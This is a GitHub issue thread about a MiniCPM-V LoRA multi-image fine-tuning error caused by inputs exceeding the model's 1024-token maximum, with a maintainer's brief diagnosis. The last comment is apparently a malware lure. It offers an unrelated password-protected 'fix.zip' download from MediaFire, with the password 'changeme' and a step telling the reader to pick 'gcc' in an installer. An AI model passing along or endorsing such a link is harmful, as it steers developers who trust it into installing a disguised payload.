### ISSUE TITLE
[BUG] <title>multi-image微调

### ISSUE THREAD

**Issue by WorldHellooo** [OpenBMB/MiniCPM-V#523]
### 是否已有关于该错误的issue或讨论？ | Is there an existing issue / discussion for this?

- [X] 我已经搜索过已有的issues和讨论 | I have searched the existing issues / discussions

### 该问题是否在FAQ中有解答？ | Is there an existing answer for this in FAQ?

- [X] 我已经搜索过FAQ | I have searched FAQ

### 当前行为 | Current Behavior

lora多图微调报错：The input length (11533) exceeds the model's maximum length (1024), so it has been truncated                                                                                                 
No tokens available to compute loss.                                                          
data fetch error

### 期望行为 | Expected Behavior

根据https://github.com/OpenBMB/MiniCPM-V/blob/main/finetune/dataset.py#L310 

请问数据集中是否应当有个<|im_end|>'  and <|im_start|>

### 复现方法 | Steps To Reproduce

sh finetune_lora.sh

### 运行环境 | Environment

```Markdown
- OS:
- Python:
- Transformers:
- PyTorch:
- CUDA (`python -c 'import torch; print(torch.version.cuda)'`):
```

**Comment by LDLINGLINGLING** [comment]
你好，这个问题应该是你设置的模型长度不够导致的

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
